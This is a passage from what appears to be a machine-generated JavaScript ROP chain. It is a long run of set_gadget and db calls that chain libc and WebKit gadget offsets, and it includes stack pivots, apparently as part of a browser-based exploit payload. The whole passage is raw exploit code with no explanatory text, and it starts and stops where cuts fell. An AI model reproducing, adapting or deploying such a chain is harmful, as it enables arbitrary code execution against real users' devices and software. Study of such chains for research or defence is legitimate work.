[rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+390624, //L8142 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8141: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8142: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8143: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+390728, //L8145 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L8144: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L8145: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+390784, //L8146 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L8146: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L8148: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+390864, //L8150 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L8150: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+782311, //pop rsp ropchain+393104, //L7904 //L7768: libc_base+764760, //pop rsi ropchain+390960, //L8151 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L8151: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L8153: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+391080, //L8156 webkit_base+660161, //mov [rsi], rax ; mov 
al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+391064, //L8154 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L8154: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8156: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+391256, //L8159 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+391272, //L8160 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+391224, //L8157 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+391240, //L8158 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8157: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L8158: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8159: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8160: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+391368, //L8162 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+391352, //L8161 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L8161: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8162: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L8163: db([8, 0]); // 0x8 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L8164: db([8, 0]); // 0x8 
set_gadget(libc_base+763368,); //pop rcx //L8165: db([8, 0]); // 0x8 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+391648, //L8167 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+391664, //L8168 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+391632, //L8166 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L8166: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8167: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8168: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+391776, //L8170 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+391824, //L8173 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+391792, //L8171 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L8170: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8171: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L8172: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8173: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+391936, //L8174+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+391928, //L8174 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 
libc_base+782311 //pop rsp ]); //L8174: db([0, 0]); // 0x0 set_gadgets([ ropchain+391952, //L8174+24 ropchain+392088, //L8169 libc_base+759608 //pop rax ]); //L8175: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L8176: db([8, 0]); // 0x8 set_gadget(libc_base+763368,); //pop rcx //L8177: db([8, 0]); // 0x8 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+782311, //pop rsp ropchain+392208, //L8178 //L8169: libc_base+759608 //pop rax ]); //L8179: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L8180: db([9, 0]); // 0x9 set_gadget(libc_base+763368,); //pop rcx //L8181: db([9, 0]); // 0x9 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl //L8178: libc_base+764760, //pop rsi ropchain+392248, //L8183 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L8183: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+392304, //L8184 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L8184: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+105700, //or rax, rcx libc_base+764760, //pop rsi ropchain+392440, //L8188 webkit_base+660161, //mov 
[rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+392424, //L8187 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8186: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L8187: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8188: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+392504, //L8189 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L8189: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L8191: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L8193: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+392664, //L8196 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+392648, //L8194 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L8194: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8196: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+392808, //L8199 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+392776, //L8197 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+392792, //L8198 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8197: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8198: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8199: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi 
db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+392896, //L8201 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L8200: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L8201: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+392952, //L8202 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L8202: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L8204: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+393032, //L8206 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L8206: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+782311, //pop rsp ropchain+393104, //L7904 //L7769: libc_base+782311, //pop rsp ropchain+393104, //L7904 //L7904: libc_base+764760, //pop rsi ropchain+393144, //L8207 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L8207: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L8209: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+393264, //L8212 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+393248, //L8210 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L8210: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8212: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] 
libc_base+764760, //pop rsi ropchain+393344, //L8213 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+393360, //L8214 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L8213: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8214: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+393520, //L8218 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+393488, //L8216 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+393504, //L8217 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8215: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L8216: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8217: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8218: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+393576, //L8220 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L8220: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+393704, //L8222 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+393720, //L8223 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+393688, //L8221 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8221: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L8222: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8223: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, 
//pop rsi ropchain+393880, //L8227 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+393848, //L8225 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+393864, //L8226 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8224: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L8225: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8226: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8227: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+393936, //L8229 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L8229: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+394064, //L8231 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+394080, //L8232 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+394048, //L8230 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8230: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L8231: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8232: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+394240, //L8236 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+394208, //L8234 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+394224, //L8235 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8233: db([24, 0]); // 0x18 
set_gadget(webkit_base+3236123,); //pop r9 //L8234: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8235: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8236: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+394296, //L8238 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L8238: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+394424, //L8240 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+394440, //L8241 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+394408, //L8239 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8239: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L8240: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8241: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+394520, //L8242 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+394536, //L8243 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L8242: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8243: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+394624, //L8244 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+394640, //L8246 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L8244: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8246: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L8247: 
db([4294967196, 4294967295]); // -0x64 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L8249: db([4294967196, 4294967295]); // -0x64 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+394800, //L8252 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+394784, //L8250 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L8250: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8252: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+394976, //L8255 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+394992, //L8256 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+394944, //L8253 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+394960, //L8254 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8253: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L8254: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8255: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8256: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+395072, //L8257 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+395088, //L8258 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L8257: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8258: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi 
libc_base+764760, //pop rsi ropchain+395184, //L8260 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+395168, //L8259 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L8259: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8260: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+395264, //L8261 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L8261: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8262: db([100, 0]); // 0x64 set_gadget(libc_base+144605,); //pop rdi //L8263: db([100, 0]); // 0x64 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+395408, //L8264 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+395440, //L8266 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+395424, //L8265 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8264: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8265: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8266: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+395608, //L8268 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+395624, //L8269 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+395592, //L8267 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L8267: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8268: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8269: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+395736, //L8271 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+395784, //L8274 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+395752, //L8272 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L8271: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8272: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L8273: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8274: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+395896, //L8275+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+395888, //L8275 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L8275: db([0, 0]); // 0x0 set_gadgets([ ropchain+395912, //L8275+24 ropchain+395928, //L8270 libc_base+782311, //pop rsp ropchain+408824, //L8276 //L8270: libc_base+764760, //pop rsi ropchain+395968, //L8277 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L8277: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L8279: db([4294967196, 4294967295]); // -0x64 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+396088, //L8282 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+396072, //L8280 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L8280: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8282: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+396264, //L8285 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+396280, //L8286 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+396232, //L8283 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+396248, //L8284 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8283: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L8284: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8285: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8286: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+396360, //L8287 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+396376, //L8288 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L8287: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8288: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+396472, //L8290 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+396456, //L8289 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L8289: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8290: 
db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+396552, //L8291 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L8291: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8292: db([105, 0]); // 0x69 set_gadget(libc_base+144605,); //pop rdi //L8293: db([105, 0]); // 0x69 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+396696, //L8294 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+396728, //L8296 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+396712, //L8295 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8294: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8295: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8296: db([0, 0]); // 0x0 